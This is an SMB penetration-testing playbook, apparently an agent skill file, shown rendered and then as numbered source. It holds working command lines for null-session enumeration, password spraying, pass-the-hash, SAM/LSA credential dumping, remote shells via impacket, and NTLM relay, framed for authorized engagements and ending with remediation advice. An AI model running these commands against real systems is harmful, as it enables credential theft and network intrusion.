Pentesting SMB (port 445/139)
When to Use
- During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
- When you need to enumerate shares, users, groups, and the domain password policy
- When testing for anonymous/null sessions, guest access, and default credentials
- When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
- When assessing Samba servers on Linux/Unix for dangerous
smb.conf misconfigurations
Quick Enumeration
# Version and vuln scan (also fingerprints OS)
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
nmap --script smb-vuln-ms17-010 -p 445 <IP> # EternalBlue check
# Full enumeration via null/anon IPC$ session
enum4linux -a <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
# netexec / crackmapexec (the modern workhorse)
netexec smb <IP> # banner, signing, domain, OS
crackmapexec smb <IP> -u '' -p '' --shares # null session shares
crackmapexec smb <IP> -u 'guest' -p '' --shares # guest session shares
# rpcclient null session
rpcclient -U "" -N <IP>
Critical: Checks Most Often Missed
- Null / anonymous session on IPC$ — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via
enum4linux/enum4linux-ng.
- Guest account access — guest with a blank password frequently lists shares even when null does not.
- SMB signing not required — enables SMB relay (NTLM relay) attacks.
netexec smb <IP> reports signing:False.
- EternalBlue (MS17-010) — unpatched SMBv1 remote code execution. Confirm with
nmap --script smb-vuln-ms17-010 or crackmapexec smb <IP> -M ms17-010. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
- Readable SYSVOL/NETLOGON — readable by all authenticated domain users. Hunt for
Registry.xml (GPP autologon passwords), web.config, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
- NTFS vs share ACL mismatch — a share that looks read-only may still allow file writes. Always test by uploading a small file.
How to CONFIRM: a null session is confirmed when smbclient -U '%' -N \\\\<IP>\\IPC$ -c '' returns no error, or crackmapexec smb <IP> -u '' -p '' --shares lists shares. Treat NT_STATUS_ACCESS_DENIED as "share exists, no access" and NT_STATUS_BAD_NETWORK_NAME as "share does not exist."
Workflow
Step 1: Enumerate (shares, users, domain info)
# Shares (try null, then guest, then creds)
smbclient --no-pass -L //<IP> # null user
smbmap -H <IP> # null user, shows perms
crackmapexec smb <IP> -u '' -p '' --shares
# Users / groups / password policy
crackmapexec smb <IP> --users [-u <user> -p <pass>]
crackmapexec smb <IP> --groups [-u <user> -p <pass>]
crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
rpcclient -U "" -N <IP> -c 'enumdomusers'
rpcclient -U "" -N <IP> -c 'enumdomgroups'
# RID cycling / SID lookup to recover usernames
lookupsid.py -no-pass <DOMAIN>/@<IP>
crackmapexec smb <IP> -u 'guest' -p '' --rid-brute
Step 2: Authenticate (null session, default creds, password spray)
# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)
# Validate a single credential pair
crackmapexec smb <IP> -u 'user' -p 'Password1' # (+) = valid, Pwn3d! = admin
# Password spray across a user list (mind lockout policy!)
crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success
# Pass-the-Hash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
smbmap -u "username" -p "<NT>:<LM>" -H <IP> # PtH with smbmap
# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED)
sudo ntpdate <dc.fqdn> # avoid KRB_AP_ERR_SKEW
netexec smb <dc.fqdn> -k # use ccache TGT
smbclient --kerberos //ws01.domain.com/C$
Step 3: Exploit / Extract (share access, secrets dumping)
# Connect to a share and pull files
smbclient --no-pass //<IP>/<Share>
smbclient //<IP>/<share> -c 'recurse; prompt; mget *' # download everything
smbmap -R <Share> -H <IP> -A '<FileName>' -q # search + download
# Try common hidden shares
smbclient -U '%' -N \\\\<IP>\\ADMIN$ # also C$, IPC$, SYSVOL, NETLOGON
# Spider shares for secrets
crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'
# Dump credentials with valid (admin) creds
crackmapexec smb <IP> -u Administrator -p 'pass' --sam # local SAM hashes
crackmapexec smb <IP> -u Administrator -p 'pass' --lsa # LSA secrets
secretsdump.py [[domain/]username[:password]@]<IP> # impacket full dump
# Remote registry read
reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s
Step 4: Post-access / lateral movement
# Command execution (wmiexec = default for CME; fileless options)
crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
# --exec-method {mmcexec,smbexec,atexec,wmiexec}
# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
psexec.py [[domain/]username[:password]@]<IP> # new service via \pipe\svcctl
wmiexec.py [[domain/]username[:password]@]<IP> # DCOM via port 135, fileless
smbexec.py [[domain/]username[:password]@]<IP> # cmd/powershell via service
atexec.py [[domain/]username[:password]@]<IP> "whoami" # Task Scheduler \pipe\atsvc
# All support -hashes <LM:NT> for PtH and -k for Kerberos
# SMB relay (when signing not required) — capture + relay NTLM
ntlmrelayx.py -tf targets.txt -smb2support
Key Concepts
| Concept |
Description |
| SMB / CIFS |
Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS) |
| Null session |
Anonymous IPC$ connection with empty username/password; exposes services over named pipes |
| IPC$ |
Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc) |
| Pass-the-Hash (PtH) |
Authenticating with an NT hash instead of a cleartext password |
| SMB signing |
Integrity protection; when not required, NTLM relay attacks become possible |
| RID cycling |
Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups |
| SYSVOL/NETLOGON |
Domain shares readable by authenticated users; common source of GPP/script credentials |
| EternalBlue (MS17-010) |
SMBv1 kernel pool overflow giving unauthenticated remote code execution |
Tools & Systems
| Tool |
Purpose |
| nmap (smb-* NSE) |
Version detection, security mode, MS17-010 vuln check |
| netexec / crackmapexec |
Share/user/group enum, spraying, PtH, secrets dump, command exec |
| enum4linux-ng |
Aggregated null-session enumeration (OS, domain, users, shares, policy) |
| rpcclient |
Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser) |
| smbclient / smbmap |
Share listing, file transfer, recursive search and download |
| impacket |
psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx |
| Snaffler / ShareHound |
Automated discovery of sensitive files and share ACLs across the domain |
Common Scenarios
Scenario 1: Anonymous Enumeration
A host allows null sessions. enum4linux-ng -A <IP> reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.
Scenario 2: GPP Password in SYSVOL
A domain user can read \\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml containing an autologon password configured via Group Policy, granting workstation access.
Scenario 3: Pass-the-Hash Lateral Movement
A dumped local Administrator NT hash is reused across the subnet. crackmapexec smb <subnet> -u Administrator -H <hash> flags hosts as Pwn3d!, and wmiexec.py -hashes :<hash> Administrator@<IP> yields a shell.
Scenario 4: EternalBlue Target
nmap --script smb-vuln-ms17-010 flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.
Output Format
## SMB Finding
**Service**: SMB/CIFS
**Severity**: <Critical|High|Medium|Low>
**Host**: <IP>:445
**Access Level**: <null | guest | authenticated | admin>
### Summary
<What was found: null session, weak creds, MS17-010, exposed share, etc.>
### Evidence
- Command: <exact command run>
- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>
### Affected Resources
| Share / Object | Access | Notable Contents |
|----------------|--------|------------------|
| SYSVOL | read | Registry.xml with GPP password |
| C$ | read/write (admin) | full filesystem |
### Reproduction Steps
1. <step>
2. <step>
### Recommendation
1. Disable null/anonymous sessions and the guest account
2. Require SMB signing on all hosts
3. Patch MS17-010 / disable SMBv1
4. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
5. Enforce strong, unique local administrator passwords (LAPS)
1---2name: pentesting-smb3description: Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA dumping, and notable CVEs such as EternalBlue (MS17-010).4license: Apache-2.05---6
7# Pentesting SMB (port 445/139)
8
9## When to Use
10
11- During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
12- When you need to enumerate shares, users, groups, and the domain password policy
13- When testing for anonymous/null sessions, guest access, and default credentials
14- When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
15- When assessing Samba servers on Linux/Unix for dangerous `smb.conf` misconfigurations
16
17## Quick Enumeration
18
19```bash
20# Version and vuln scan (also fingerprints OS)
21nmap --script "safe or smb-enum-*" -p 445 <IP>
22nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
23nmap --script smb-vuln-ms17-010 -p 445 <IP> # EternalBlue check
24
25# Full enumeration via null/anon IPC$ session
26enum4linux -a <IP>
27enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
28
29# netexec / crackmapexec (the modern workhorse)
30netexec smb <IP> # banner, signing, domain, OS
31crackmapexec smb <IP> -u '' -p '' --shares # null session shares
32crackmapexec smb <IP> -u 'guest' -p '' --shares # guest session shares
33
34# rpcclient null session
35rpcclient -U "" -N <IP>
36```
37
38## Critical: Checks Most Often Missed
39
401. **Null / anonymous session on IPC$** — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via `enum4linux`/`enum4linux-ng`.
412. **Guest account access** — guest with a blank password frequently lists shares even when null does not.
423. **SMB signing not required** — enables SMB relay (NTLM relay) attacks. `netexec smb <IP>` reports `signing:False`.
434. **EternalBlue (MS17-010)** — unpatched SMBv1 remote code execution. Confirm with `nmap --script smb-vuln-ms17-010` or `crackmapexec smb <IP> -M ms17-010`. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
445. **Readable SYSVOL/NETLOGON** — readable by all authenticated domain users. Hunt for `Registry.xml` (GPP autologon passwords), `web.config`, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
456. **NTFS vs share ACL mismatch** — a share that looks read-only may still allow file writes. Always test by uploading a small file.
46
47How to CONFIRM: a null session is confirmed when `smbclient -U '%' -N \\\\<IP>\\IPC$ -c ''` returns no error, or `crackmapexec smb <IP> -u '' -p '' --shares` lists shares. Treat `NT_STATUS_ACCESS_DENIED` as "share exists, no access" and `NT_STATUS_BAD_NETWORK_NAME` as "share does not exist."
48
49## Workflow
50
51### Step 1: Enumerate (shares, users, domain info)
52
53```bash
54# Shares (try null, then guest, then creds)
55smbclient --no-pass -L //<IP> # null user
56smbmap -H <IP> # null user, shows perms
57crackmapexec smb <IP> -u '' -p '' --shares
58
59# Users / groups / password policy
60crackmapexec smb <IP> --users [-u <user> -p <pass>]
61crackmapexec smb <IP> --groups [-u <user> -p <pass>]
62crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
63rpcclient -U "" -N <IP> -c 'enumdomusers'
64rpcclient -U "" -N <IP> -c 'enumdomgroups'
65
66# RID cycling / SID lookup to recover usernames
67lookupsid.py -no-pass <DOMAIN>/@<IP>
68crackmapexec smb <IP> -u 'guest' -p '' --rid-brute
69```
70
71### Step 2: Authenticate (null session, default creds, password spray)
72
73```bash
74# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)
75
76# Validate a single credential pair
77crackmapexec smb <IP> -u 'user' -p 'Password1' # (+) = valid, Pwn3d! = admin
78
79# Password spray across a user list (mind lockout policy!)
80crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success
81
82# Pass-the-Hash
83crackmapexec smb <IP> -u Administrator -H <NTHASH>
84smbmap -u "username" -p "<NT>:<LM>" -H <IP> # PtH with smbmap
85
86# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED)
87sudo ntpdate <dc.fqdn> # avoid KRB_AP_ERR_SKEW
88netexec smb <dc.fqdn> -k # use ccache TGT
89smbclient --kerberos //ws01.domain.com/C$
90```
91
92### Step 3: Exploit / Extract (share access, secrets dumping)
93
94```bash
95# Connect to a share and pull files
96smbclient --no-pass //<IP>/<Share>
97smbclient //<IP>/<share> -c 'recurse; prompt; mget *' # download everything
98smbmap -R <Share> -H <IP> -A '<FileName>' -q # search + download
99
100# Try common hidden shares
101smbclient -U '%' -N \\\\<IP>\\ADMIN$ # also C$, IPC$, SYSVOL, NETLOGON
102
103# Spider shares for secrets
104crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'
105
106# Dump credentials with valid (admin) creds
107crackmapexec smb <IP> -u Administrator -p 'pass' --sam # local SAM hashes
108crackmapexec smb <IP> -u Administrator -p 'pass' --lsa # LSA secrets
109secretsdump.py [[domain/]username[:password]@]<IP> # impacket full dump
110
111# Remote registry read
112reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s
113```
114
115### Step 4: Post-access / lateral movement
116
117```bash
118# Command execution (wmiexec = default for CME; fileless options)
119crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
120crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
121# --exec-method {mmcexec,smbexec,atexec,wmiexec}
122
123# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
124psexec.py [[domain/]username[:password]@]<IP> # new service via \pipe\svcctl
125wmiexec.py [[domain/]username[:password]@]<IP> # DCOM via port 135, fileless
126smbexec.py [[domain/]username[:password]@]<IP> # cmd/powershell via service
127atexec.py [[domain/]username[:password]@]<IP> "whoami" # Task Scheduler \pipe\atsvc
128# All support -hashes <LM:NT> for PtH and -k for Kerberos
129
130# SMB relay (when signing not required) — capture + relay NTLM
131ntlmrelayx.py -tf targets.txt -smb2support
132```
133
134## Key Concepts
135
136| Concept | Description |
137|---------|-------------|
138| **SMB / CIFS** | Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS) |
139| **Null session** | Anonymous IPC$ connection with empty username/password; exposes services over named pipes |
140| **IPC$** | Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc) |
141| **Pass-the-Hash (PtH)** | Authenticating with an NT hash instead of a cleartext password |
142| **SMB signing** | Integrity protection; when not required, NTLM relay attacks become possible |
143| **RID cycling** | Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups |
144| **SYSVOL/NETLOGON** | Domain shares readable by authenticated users; common source of GPP/script credentials |
145| **EternalBlue (MS17-010)** | SMBv1 kernel pool overflow giving unauthenticated remote code execution |
146
147## Tools & Systems
148
149| Tool | Purpose |
150|------|---------|
151| **nmap** (smb-* NSE) | Version detection, security mode, MS17-010 vuln check |
152| **netexec / crackmapexec** | Share/user/group enum, spraying, PtH, secrets dump, command exec |
153| **enum4linux-ng** | Aggregated null-session enumeration (OS, domain, users, shares, policy) |
154| **rpcclient** | Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser) |
155| **smbclient / smbmap** | Share listing, file transfer, recursive search and download |
156| **impacket** | psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx |
157| **Snaffler / ShareHound** | Automated discovery of sensitive files and share ACLs across the domain |
158
159## Common Scenarios
160
161### Scenario 1: Anonymous Enumeration
162A host allows null sessions. `enum4linux-ng -A <IP>` reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.
163
164### Scenario 2: GPP Password in SYSVOL
165A domain user can read `\\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml` containing an autologon password configured via Group Policy, granting workstation access.
166
167### Scenario 3: Pass-the-Hash Lateral Movement
168A dumped local Administrator NT hash is reused across the subnet. `crackmapexec smb <subnet> -u Administrator -H <hash>` flags hosts as `Pwn3d!`, and `wmiexec.py -hashes :<hash> Administrator@<IP>` yields a shell.
169
170### Scenario 4: EternalBlue Target
171`nmap --script smb-vuln-ms17-010` flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.
172
173## Output Format
174
175```
176## SMB Finding
177
178**Service**: SMB/CIFS
179**Severity**: <Critical|High|Medium|Low>
180**Host**: <IP>:445
181**Access Level**: <null | guest | authenticated | admin>
182
183### Summary
184<What was found: null session, weak creds, MS17-010, exposed share, etc.>
185
186### Evidence
187- Command: <exact command run>
188- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>
189
190### Affected Resources
191| Share / Object | Access | Notable Contents |
192|----------------|--------|------------------|
193| SYSVOL | read | Registry.xml with GPP password |
194| C$ | read/write (admin) | full filesystem |
195
196### Reproduction Steps
1971. <step>
1982. <step>
199
200### Recommendation
2011. Disable null/anonymous sessions and the guest account
2022. Require SMB signing on all hosts
2033. Patch MS17-010 / disable SMBv1
2044. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
2055. Enforce strong, unique local administrator passwords (LAPS)
206```